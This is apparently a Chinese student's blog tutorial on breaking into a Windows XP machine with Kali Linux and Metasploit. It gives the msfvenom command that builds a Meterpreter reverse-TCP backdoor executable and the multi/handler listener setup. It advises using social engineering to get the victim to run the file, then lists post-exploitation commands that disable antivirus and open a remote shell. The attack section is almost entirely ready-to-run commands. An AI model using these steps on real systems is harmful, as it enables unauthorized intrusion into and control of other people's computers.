admin 管理员组

文章数量: 887018

    这学期老师布置了一个不算大的大作业,让我们组队做一个攻击。思来想去,作为一个小白,也只能做一些比较简单的攻击,于是就从网上找了用metasploit黑入Windows xp的方法。这里我先把需要的命令列出来,然后详细地解释每条命令的具体含义,最后再介绍一些常用的操作。

1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe

2.root@kali:/# ls -la /root/program.exe

3.root@kali:# msfconsole

4.msf5 > use exploit/multi/handler

5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp

6.msf5 exploit(handler) > set lhost 192.168.189.128

7.msf5 exploit(handler) > set lport 4444

8.msf5 exploit(handler) > exploit

目标系统上运行program.exe

现在就成功入侵了对方的系统。下面就来讲解一下每条指令的用法和含义。


1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe

这条命令创建payload程序。payload是啥呢?payload被称为“载荷”,也就是说能实施恶意行为的部分,就先叫它恶意软件吧。msfvenom是一个根据不同平台产生相应的后门的软件,kali上自带的有。后面的参数:p对应payload,其他的大致都能看明白。需要注意的是,LHOST是自己的主机ip,端口的话可以根据你自己的想法设置,不想麻烦的用4444就行,反正可以建立很多端口。  好啦,这条命令过后,就生成了program.exe作为载荷,放在了root目录下面。

2.root@kali:/# ls -la /root/program.exe

使用这条命令可以查看payload的位置。

3.root@kali:# msfconsole

打开了metasploit,就是那个会用一些字符组成一个很帅的图案的牛逼软件啦。metasploit在网上的定义,唯一有用的就一句:本身附带数百个已知软件漏洞的专业级漏洞攻击工具。所以可以用这个软件做各种骚操作。

4.msf5 > use exploit/multi/handler

按照专业的定义:Metasploit has exploit/multi/handler, which is a special exploit module that isn't really an exploit, for exactly this purpose. All it does is allow you to configure a payload and run the handler for it.大致就是说这个工具会方便你配置payload。

5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp

这里应该就是对payload进行设置吧,我也不太懂,照做吧。

6.msf5 exploit(handler) > set lhost 192.168.189.128

设置攻击机的ip,就是自己kali的ip。

7.msf5 exploit(handler) > set lport 4444

设置端口,上面说过的。

8.msf5 exploit(handler) > exploit

开始攻击。这条命令之后,需要victim打开program.exe,运行payload,这样才能实施攻击。至于如何让victim打开program.exe,这就看你自己了,动用社会工程学等各种方法都行。

在对方没有打开program.exe时,我的界面是这样的,等待中。

当对方打开program.exe后,就变成了下面这样。

这就进入了meterpreter,然后就可以实施各种高端操作了。


1.sysinfo 可以查看victim机器的基本情况。比如系统版本、架构之类的。

2.idletime  查看victim主机的运行时间。

3.run post/windows/manage/killav 关闭victim的杀毒软件

4. shell 进入对方的cmd中

更多操作可以参考这篇https://blog.csdn/qq_41880069/article/details/82908293#3meterpreter_185

本文标签: kali Windows XP